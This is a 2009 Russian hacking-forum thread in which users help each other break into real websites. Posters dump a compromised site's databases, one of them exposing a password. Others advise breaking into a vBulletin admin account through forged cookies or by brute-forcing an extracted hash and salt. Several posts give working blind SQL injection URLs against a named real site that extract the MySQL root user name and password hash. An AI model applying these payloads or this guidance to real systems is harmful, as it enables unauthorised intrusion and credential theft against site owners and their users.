ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #5491  
Старый 14.02.2009, 14:22
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278

Репутация: 114
По умолчанию

Скажу сразу, там кароче любые команды идут sql, не знаю логина и пароль админа, но пробовал select from.. всё идёт! Что подскажете?
 

  #5492  
Старый 15.02.2009, 11:19
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278

Репутация: 114
По умолчанию

делал бэкап дб таким способом:

mysqldump -utracker -ptester. --all-databases > /www/tracker/stats/fuckme.sql

Выбило:

Shell command: mysqldump -utracker -paaa67&1!a. --all-databases > /www/tracker/stats/fuckme.sql

Usage: mysqldump [OPTIONS] database [tables]
OR mysqldump [OPTIONS] --databases [OPTIONS] DB1 [DB2 DB3...]
OR mysqldump [OPTIONS] --all-databases [OPTIONS]
For more options, use mysqldump --help


Что не так ?
 

  #5493  
Старый 15.02.2009, 11:21
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

Смотря что за субд. В мускуле делается так:

select * from jops where name='12' into outfile '/www/files/dump.txt'
или into dumpfile
 

  #5494  
Старый 15.02.2009, 11:23
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

-utracker -ptester. -А чего это такое?
mysqldump --all-databases > all_databases.sql - Так мне кажется проще...
 

  #5495  
Старый 15.02.2009, 11:41
Input
Новичок
Регистрация: 27.06.2008
Сообщений: 24
Провел на форуме:
60495

Репутация: 3
По умолчанию

Здравствуйте уважаемые пользователи antichat.
У меня к вам вопрос. Точнее ситуация, надеюсь, вы поможете мне ее разрешить, т. к ранее я с cookies не сталкивался.

Вообщем есть сайт назовем его “x”. На его форуме движок, которого vBulletin v3.5.4.
Я имею логин администратора и его пароль в зашифровки (извлек из базы).

Так вот как мне подставить cookies? Я понимаю, что это делать надо, наверное, через Opera, но, сколько не пытался, не получалось. Помогите, пожалуйста.

Заранее огромное спасибо!
 

  #5496  
Старый 15.02.2009, 11:53
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

поставь себе денвер, поставь туда булку. и снифай через привокси или аналогичную программу запросы. потом аналогично проделай на нужном тебе сайте.
__________________
Появляюсь редко. Важные дела в реале.
 

  #5497  
Старый 15.02.2009, 12:37
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

лучше извлеки из БД ещё и соль и пробрути хеш. По кукам просто в админку не войдёшь - там повторная авторизация
 

  #5498  
Старый 15.02.2009, 15:51
MyTHblu
Новичок
Регистрация: 21.01.2009
Сообщений: 9
Провел на форуме:
82271

Репутация: 1
Отправить сообщение для MyTHblu с помощью ICQ
По умолчанию

ку всем
моя первая инъекция:
Код:
http://www.mega-porno.ru/signup.php/data:text/index.php?category=1'
не могу подобрать поля, может кто подскажет че да как?!?!?!
 

  #5499  
Старый 15.02.2009, 18:14
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+(select+1)=1+and+(banne rs.cat_link.cat_id='1
Чтоб интересней было
 

  #5500  
Старый 15.02.2009, 20:56
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

MyTHblu,

http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+ascii(substring((select +user+from+mysql.user+limit+0,1),4,1))=116+--+

user - root

http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+ascii(substring((select +password+from+mysql.user+limit+0,1),4,1))>=10+--+

а хеш сам )
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ